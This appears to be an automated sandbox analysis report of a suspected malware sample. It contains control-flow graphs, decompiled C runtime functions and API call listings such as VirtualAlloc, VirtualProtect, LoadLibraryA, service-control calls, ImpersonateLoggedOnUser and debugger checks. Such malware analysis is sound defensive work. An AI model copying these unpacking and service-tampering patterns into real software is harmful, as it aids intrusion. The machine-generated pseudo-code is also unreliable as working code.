                                                          control_flow_graph 156 1fc003c-1fc0047 157 1fc004c-1fc0263 call 1fc0a3f call 1fc0e0f call 1fc0d90 VirtualAlloc 156->157 158 1fc0049 156->158 173 1fc028b-1fc0292 157->173 174 1fc0265-1fc0289 call 1fc0a69 157->174 158->157 176 1fc02a1-1fc02b0 173->176 178 1fc02ce-1fc03c2 VirtualProtect call 1fc0cce call 1fc0ce7 174->178 176->178 179 1fc02b2-1fc02cc 176->179 185 1fc03d1-1fc03e0 178->185 179->176 186 1fc0439-1fc04b8 VirtualFree 185->186 187 1fc03e2-1fc0437 call 1fc0ce7 185->187 189 1fc04be-1fc04cd 186->189 190 1fc05f4-1fc05fe 186->190 187->185 192 1fc04d3-1fc04dd 189->192 193 1fc077f-1fc0789 190->193 194 1fc0604-1fc060d 190->194 192->190 196 1fc04e3-1fc0505 192->196 197 1fc078b-1fc07a3 193->197 198 1fc07a6-1fc07b0 193->198 194->193 199 1fc0613-1fc0637 194->199 208 1fc0517-1fc0520 196->208 209 1fc0507-1fc0515 196->209 197->198 200 1fc086e-1fc08be LoadLibraryA 198->200 201 1fc07b6-1fc07cb 198->201 202 1fc063e-1fc0648 199->202 207 1fc08c7-1fc08f9 200->207 204 1fc07d2-1fc07d5 201->204 202->193 205 1fc064e-1fc065a 202->205 210 1fc0824-1fc0833 204->210 211 1fc07d7-1fc07e0 204->211 205->193 206 1fc0660-1fc066a 205->206 212 1fc067a-1fc0689 206->212 214 1fc08fb-1fc0901 207->214 215 1fc0902-1fc091d 207->215 216 1fc0526-1fc0547 208->216 209->216 213 1fc0839-1fc083c 210->213 217 1fc07e4-1fc0822 211->217 218 1fc07e2 211->218 219 1fc068f-1fc06b2 212->219 220 1fc0750-1fc077a 212->220 213->200 221 1fc083e-1fc0847 213->221 214->215 222 1fc054d-1fc0550 216->222 217->204 218->210 225 1fc06ef-1fc06fc 219->225 226 1fc06b4-1fc06ed 219->226 220->202 227 1fc0849 221->227 228 1fc084b-1fc086c 221->228 223 1fc0556-1fc056b 222->223 224 1fc05e0-1fc05ef 222->224 230 1fc056d 223->230 231 1fc056f-1fc057a 223->231 224->192 232 1fc06fe-1fc0748 225->232 233 1fc074b 225->233 226->225 227->200 228->213 230->224 234 1fc057c-1fc0599 231->234 235 1fc059b-1fc05bb 231->235 232->233 233->212 240 1fc05bd-1fc05db 234->240 235->240 240->222
                                                          APIs
                                                          • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 01FC024D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID: cess$kernel32.dll
                                                          • API String ID: 4275171209-1230238691
                                                          • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                          • Instruction ID: a5c574cd58e517a40efcf4c2b804d3ba0007d693fe7eaa4450cac5bff4cadf46
                                                          • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                          • Instruction Fuzzy Hash: 89526979A01229DFDB64CF58C984BACBBB1BF09304F1480D9E94DAB351DB31AA85DF14
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 241 40af66-40af6e 242 40af7d-40af88 call 40b84d 241->242 245 40af70-40af7b call 40d2e3 242->245 246 40af8a-40af8b 242->246 245->242 249 40af8c-40af98 245->249 250 40afb3-40afca call 40af49 call 40cd39 249->250 251 40af9a-40afb2 call 40aefc call 40d2bd 249->251 251->250
                                                          C-Code - Quality: 63%
                                                          			E0040AF66(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
                                                          				signed int _v4;
                                                          				signed int _v16;
                                                          				signed int _v40;
                                                          				void* _t14;
                                                          				signed int _t15;
                                                          				intOrPtr* _t21;
                                                          				signed int _t24;
                                                          				void* _t28;
                                                          				void* _t39;
                                                          				void* _t40;
                                                          				signed int _t42;
                                                          				void* _t45;
                                                          				void* _t47;
                                                          				void* _t51;
                                                          
                                                          				_t40 = __edi;
                                                          				_t28 = __ebx;
                                                          				_t45 = _t51;
                                                          				while(1) {
                                                          					_t14 = E0040B84D(_t28, _t39, _t40, _a4); // executed
                                                          					if(_t14 != 0) {
                                                          						break;
                                                          					}
                                                          					_t15 = E0040D2E3(_a4);
                                                          					__eflags = _t15;
                                                          					if(_t15 == 0) {
                                                          						__eflags =  *0x423490 & 0x00000001;
                                                          						if(( *0x423490 & 0x00000001) == 0) {
                                                          							 *0x423490 =  *0x423490 | 0x00000001;
                                                          							__eflags =  *0x423490;
                                                          							E0040AEFC(0x423484);
                                                          							E0040D2BD( *0x423490, 0x41a704);
                                                          						}
                                                          						E0040AF49( &_v16, 0x423484);
                                                          						E0040CD39( &_v16, 0x420fa4);
                                                          						asm("int3");
                                                          						_t47 = _t45;
                                                          						_push(_t47);
                                                          						_push(0xc);
                                                          						_push(0x420ff8);
                                                          						_t19 = E0040E1D8(_t28, _t40, 0x423484);
                                                          						_t42 = _v4;
                                                          						__eflags = _t42;
                                                          						if(_t42 != 0) {
                                                          							__eflags =  *0x4250b0 - 3;
                                                          							if( *0x4250b0 != 3) {
                                                          								_push(_t42);
                                                          								goto L16;
                                                          							} else {
                                                          								E0040D6E0(_t28, 4);
                                                          								_v16 = _v16 & 0x00000000;
                                                          								_t24 = E0040D713(_t42);
                                                          								_v40 = _t24;
                                                          								__eflags = _t24;
                                                          								if(_t24 != 0) {
                                                          									_push(_t42);
                                                          									_push(_t24);
                                                          									E0040D743();
                                                          								}
                                                          								_v16 = 0xfffffffe;
                                                          								_t19 = E0040B70B();
                                                          								__eflags = _v40;
                                                          								if(_v40 == 0) {
                                                          									_push(_v4);
                                                          									L16:
                                                          									__eflags = HeapFree( *0x4234b4, 0, ??);
                                                          									if(__eflags == 0) {
                                                          										_t21 = E0040BFC1(__eflags);
                                                          										 *_t21 = E0040BF7F(GetLastError());
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          						return E0040E21D(_t19);
                                                          					} else {
                                                          						continue;
                                                          					}
                                                          					L19:
                                                          				}
                                                          				return _t14;
                                                          				goto L19;
                                                          			}


















                                                          APIs
                                                          • _malloc.LIBCMT ref: 0040AF80
                                                            • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                            • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                            • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                          • std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3
                                                            • Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08
                                                          • std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
                                                          • __CxxThrowException@8.LIBCMT ref: 0040AFC5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
                                                          • String ID:
                                                          • API String ID: 1411284514-0
                                                          • Opcode ID: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
                                                          • Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
                                                          • Opcode Fuzzy Hash: a95b220d2d9c14b1a5c56d8a9dfd7e07f088015f43c1402ade5625b42879af68
                                                          • Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 277 1fc0e0f-1fc0e24 SetErrorMode * 2 278 1fc0e2b-1fc0e2c 277->278 279 1fc0e26 277->279 279->278
                                                          APIs
                                                          • SetErrorMode.KERNELBASE(00000400,?,?,01FC0223,?,?), ref: 01FC0E19
                                                          • SetErrorMode.KERNELBASE(00000000,?,?,01FC0223,?,?), ref: 01FC0E1E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorMode
                                                          • String ID:
                                                          • API String ID: 2340568224-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 280 40e7ee-40e7f6 call 40e7c3 282 40e7fb-40e7ff ExitProcess 280->282
                                                          C-Code - Quality: 100%
                                                          			E0040E7EE(int _a4) {
                                                          
                                                          				E0040E7C3(_a4); // executed
                                                          				ExitProcess(_a4);
                                                          			}



                                                          APIs
                                                          • ___crtCorExitProcess.LIBCMT ref: 0040E7F6
                                                            • Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
                                                            • Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
                                                            • Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA
                                                          • ExitProcess.KERNEL32 ref: 0040E7FF
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                          • String ID:
                                                          • API String ID: 2427264223-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 361 22399e8-2239a49 363 2239a82-2239ad2 OpenServiceA 361->363 364 2239a4b-2239a55 361->364 369 2239ad4-2239ada 363->369 370 2239adb-2239b0c 363->370 364->363 365 2239a57-2239a59 364->365 367 2239a5b-2239a65 365->367 368 2239a7c-2239a7f 365->368 371 2239a67 367->371 372 2239a69-2239a78 367->372 368->363 369->370 376 2239b0e-2239b12 370->376 377 2239b1c 370->377 371->372 372->372 373 2239a7a 372->373 373->368 376->377 378 2239b14 376->378 378->377
                                                          APIs
                                                          • OpenServiceA.ADVAPI32(?,?,?), ref: 02239AC2
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414771851.0000000002230000.00000040.00000800.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2230000_ajAf.jbxd
                                                          Similarity
                                                          • API ID: OpenService
                                                          • String ID:
                                                          • API String ID: 3098006287-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 379 2239920-223996f 381 2239971-2239974 379->381 382 2239977-223997b 379->382 381->382 383 2239983-22399b2 OpenSCManagerW 382->383 384 223997d-2239980 382->384 385 22399b4-22399ba 383->385 386 22399bb-22399cf 383->386 384->383 385->386
                                                          APIs
                                                          • OpenSCManagerW.SECHOST(00000000,00000000,?), ref: 022399A5
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414771851.0000000002230000.00000040.00000800.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2230000_ajAf.jbxd
                                                          Similarity
                                                          • API ID: ManagerOpen
                                                          • String ID:
                                                          • API String ID: 1889721586-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 388 2239180-2239201 VirtualProtect 391 2239203-2239209 388->391 392 223920a-223922f 388->392 391->392
                                                          APIs
                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 022391F4
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414771851.0000000002230000.00000040.00000800.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2230000_ajAf.jbxd
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 396 223a0e8-223a165 ControlService 398 223a167-223a16d 396->398 399 223a16e-223a18f 396->399 398->399
                                                          APIs
                                                          • ControlService.ADVAPI32(?,?,?), ref: 0223A158
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414771851.0000000002230000.00000040.00000800.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2230000_ajAf.jbxd
                                                          Similarity
                                                          • API ID: ControlService
                                                          • String ID:
                                                          • API String ID: 253159669-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 401 2239ed8-2239f44 ImpersonateLoggedOnUser 403 2239f46-2239f4c 401->403 404 2239f4d-2239f6e 401->404 403->404
                                                          APIs
                                                          • ImpersonateLoggedOnUser.KERNELBASE ref: 02239F37
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414771851.0000000002230000.00000040.00000800.00020000.00000000.sdmp, Offset: 02230000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_2230000_ajAf.jbxd
                                                          Similarity
                                                          • API ID: ImpersonateLoggedUser
                                                          • String ID:
                                                          • API String ID: 2216092060-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 485 40d534-40d556 HeapCreate 486 40d558-40d559 485->486 487 40d55a-40d563 485->487
                                                          C-Code - Quality: 100%
                                                          			E0040D534(intOrPtr _a4) {
                                                          				void* _t6;
                                                          
                                                          				_t6 = HeapCreate(0 | _a4 == 0x00000000, 0x1000, 0); // executed
                                                          				 *0x4234b4 = _t6;
                                                          				if(_t6 != 0) {
                                                          					 *0x4250b0 = 1;
                                                          					return 1;
                                                          				} else {
                                                          					return _t6;
                                                          				}
                                                          			}




                                                          APIs
                                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0040D549
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CreateHeap
                                                          • String ID:
                                                          • API String ID: 10892065-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 488 40ea0a-40ea16 call 40e8de 490 40ea1b-40ea1f 488->490
                                                          C-Code - Quality: 25%
                                                          			E0040EA0A(intOrPtr _a4) {
                                                          				void* __ebp;
                                                          				void* _t2;
                                                          				void* _t3;
                                                          				void* _t4;
                                                          				void* _t5;
                                                          				void* _t8;
                                                          
                                                          				_push(0);
                                                          				_push(0);
                                                          				_push(_a4);
                                                          				_t2 = E0040E8DE(_t3, _t4, _t5, _t8); // executed
                                                          				return _t2;
                                                          			}









                                                          APIs
                                                          • _doexit.LIBCMT ref: 0040EA16
                                                            • Part of subcall function 0040E8DE: __lock.LIBCMT ref: 0040E8EC
                                                            • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E923
                                                            • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E938
                                                            • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E962
                                                            • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E978
                                                            • Part of subcall function 0040E8DE: __decode_pointer.LIBCMT ref: 0040E985
                                                            • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9B4
                                                            • Part of subcall function 0040E8DE: __initterm.LIBCMT ref: 0040E9C4
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: __decode_pointer$__initterm$__lock_doexit
                                                          • String ID:
                                                          • API String ID: 1597249276-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • TerminateProcess.KERNELBASE(000000FF,00000000), ref: 01FC0929
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ProcessTerminate
                                                          • String ID:
                                                          • API String ID: 560597551-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414527376.0000000001F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F9D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1f9d000_ajAf.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414527376.0000000001F9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 01F9D000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1f9d000_ajAf.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 85%
                                                          			E0040CE09(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                                                          				intOrPtr _v0;
                                                          				void* _v804;
                                                          				intOrPtr _v808;
                                                          				intOrPtr _v812;
                                                          				intOrPtr _t6;
                                                          				intOrPtr _t11;
                                                          				intOrPtr _t12;
                                                          				intOrPtr _t13;
                                                          				long _t17;
                                                          				intOrPtr _t21;
                                                          				intOrPtr _t22;
                                                          				intOrPtr _t25;
                                                          				intOrPtr _t26;
                                                          				intOrPtr _t27;
                                                          				intOrPtr* _t31;
                                                          				void* _t34;
                                                          
                                                          				_t27 = __esi;
                                                          				_t26 = __edi;
                                                          				_t25 = __edx;
                                                          				_t22 = __ecx;
                                                          				_t21 = __ebx;
                                                          				_t6 = __eax;
                                                          				_t34 = _t22 -  *0x422234; // 0x99931ded
                                                          				if(_t34 == 0) {
                                                          					asm("repe ret");
                                                          				}
                                                          				 *0x423b98 = _t6;
                                                          				 *0x423b94 = _t22;
                                                          				 *0x423b90 = _t25;
                                                          				 *0x423b8c = _t21;
                                                          				 *0x423b88 = _t27;
                                                          				 *0x423b84 = _t26;
                                                          				 *0x423bb0 = ss;
                                                          				 *0x423ba4 = cs;
                                                          				 *0x423b80 = ds;
                                                          				 *0x423b7c = es;
                                                          				 *0x423b78 = fs;
                                                          				 *0x423b74 = gs;
                                                          				asm("pushfd");
                                                          				_pop( *0x423ba8);
                                                          				 *0x423b9c =  *_t31;
                                                          				 *0x423ba0 = _v0;
                                                          				 *0x423bac =  &_a4;
                                                          				 *0x423ae8 = 0x10001;
                                                          				_t11 =  *0x423ba0; // 0x0
                                                          				 *0x423a9c = _t11;
                                                          				 *0x423a90 = 0xc0000409;
                                                          				 *0x423a94 = 1;
                                                          				_t12 =  *0x422234; // 0x99931ded
                                                          				_v812 = _t12;
                                                          				_t13 =  *0x422238; // 0x666ce212
                                                          				_v808 = _t13;
                                                          				 *0x423ae0 = IsDebuggerPresent();
                                                          				_push(1);
                                                          				E004138FC(_t14);
                                                          				SetUnhandledExceptionFilter(0);
                                                          				_t17 = UnhandledExceptionFilter(0x41fb80);
                                                          				if( *0x423ae0 == 0) {
                                                          					_push(1);
                                                          					E004138FC(_t17);
                                                          				}
                                                          				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                                                          			}




















                                                          APIs
                                                          • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                          • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                          • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                          • String ID:
                                                          • API String ID: 2579439406-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • IsDebuggerPresent.KERNEL32 ref: 01FD395B
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 01FD3970
                                                          • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 01FD397B
                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 01FD3997
                                                          • TerminateProcess.KERNEL32(00000000), ref: 01FD399E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                          • String ID:
                                                          • API String ID: 2579439406-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0040ADB0(intOrPtr* __ecx) {
                                                          				void* _t5;
                                                          				intOrPtr* _t11;
                                                          
                                                          				_t11 = __ecx;
                                                          				_t5 =  *(__ecx + 8);
                                                          				 *__ecx = 0x41eff0;
                                                          				if(_t5 != 0) {
                                                          					_t5 =  *((intOrPtr*)( *((intOrPtr*)( *_t5 + 8))))(_t5);
                                                          				}
                                                          				if( *(_t11 + 0xc) != 0) {
                                                          					_t5 = GetProcessHeap();
                                                          					if(_t5 != 0) {
                                                          						return HeapFree(_t5, 0,  *(_t11 + 0xc));
                                                          					}
                                                          				}
                                                          				return _t5;
                                                          			}






                                                          APIs
                                                          • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.413978160.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.413978160.0000000000426000.00000040.00000001.01000000.00000005.sdmp
                                                          • Associated: 00000002.00000002.413978160.000000000042F000.00000040.00000001.01000000.00000005.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$FreeProcess
                                                          • String ID:
                                                          • API String ID: 3859560861-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.414584298.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 01FC0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_1fc0000_ajAf.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 86%
                                                          			E00417081(short* __ecx, int _a4, signed int _a8, char* _a12, int _a16, char* _a20, int _a24, int _a28, intOrPtr _a32) {
                                                          				signed int _v8;
                                                          				int _v12;
                                                          				int _v16;
                                                          				int _v20;
                                                          				intOrPtr _v24;
                                                          				void* _v36;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				void* __ebp;
                                                          				signed int _t110;
                                                          				intOrPtr _t112;
                                                          				intOrPtr _t113;
                                                          				short* _t115;
                                                          				short* _t116;
                                                          				char* _t120;
                                                          				short* _t121;
                                                          				short* _t123;
                                                          				short* _t127;
                                                          				int _t128;
                                                          				short* _t141;
                                                          				signed int _t144;
                                                          				void* _t146;
                                                          				short* _t147;
                                                          				signed int _t150;
                                                          				short* _t153;
                                                          				char* _t157;
                                                          				int _t160;
                                                          				long _t162;
                                                          				signed int _t174;
                                                          				signed int _t178;
                                                          				signed int _t179;
                                                          				int _t182;
                                                          				short* _t184;
                                                          				signed int _t186;
                                                          				signed int _t188;
                                                          				short* _t189;
                                                          				int _t191;
                                                          				intOrPtr _t194;
                                                          				int _t207;
                                                          
                                                          				_t110 =  *0x422234; // 0x99931ded
                                                          				_v8 = _t110 ^ _t188;
                                                          				_t184 = __ecx;
                                                          				_t194 =  *0x423e7c; // 0x1
                                                          				if(_t194 == 0) {
                                                          					_t182 = 1;
                                                          					if(LCMapStringW(0, 0x100, 0x420398, 1, 0, 0) == 0) {
                                                          						_t162 = GetLastError();
                                                          						__eflags = _t162 - 0x78;
                                                          						if(_t162 == 0x78) {
                                                          							 *0x423e7c = 2;
                                                          						}
                                                          					} else {
                                                          						 *0x423e7c = 1;
                                                          					}
                                                          				}
                                                          				if(_a16 <= 0) {
                                                          					L13:
                                                          					_t112 =  *0x423e7c; // 0x1
                                                          					if(_t112 == 2 || _t112 == 0) {
                                                          						_v16 = 0;
                                                          						_v20 = 0;
                                                          						__eflags = _a4;
                                                          						if(_a4 == 0) {
                                                          							_a4 =  *((intOrPtr*)( *_t184 + 0x14));
                                                          						}
                                                          						__eflags = _a28;
                                                          						if(_a28 == 0) {
                                                          							_a28 =  *((intOrPtr*)( *_t184 + 4));
                                                          						}
                                                          						_t113 = E00417A20(0, _t179, _t182, _t184, _a4);
                                                          						_v24 = _t113;
                                                          						__eflags = _t113 - 0xffffffff;
                                                          						if(_t113 != 0xffffffff) {
                                                          							__eflags = _t113 - _a28;
                                                          							if(_t113 == _a28) {
                                                          								_t184 = LCMapStringA(_a4, _a8, _a12, _a16, _a20, _a24);
                                                          								L78:
                                                          								__eflags = _v16;
                                                          								if(__eflags != 0) {
                                                          									_push(_v16);
                                                          									E0040B6B5(0, _t182, _t184, __eflags);
                                                          								}
                                                          								_t115 = _v20;
                                                          								__eflags = _t115;
                                                          								if(_t115 != 0) {
                                                          									__eflags = _a20 - _t115;
                                                          									if(__eflags != 0) {
                                                          										_push(_t115);
                                                          										E0040B6B5(0, _t182, _t184, __eflags);
                                                          									}
                                                          								}
                                                          								_t116 = _t184;
                                                          								goto L84;
                                                          							}
                                                          							_t120 = E00417A69(_t179, _a28, _t113, _a12,  &_a16, 0, 0);
                                                          							_t191 =  &(_t189[0xc]);
                                                          							_v16 = _t120;
                                                          							__eflags = _t120;
                                                          							if(_t120 == 0) {
                                                          								goto L58;
                                                          							}
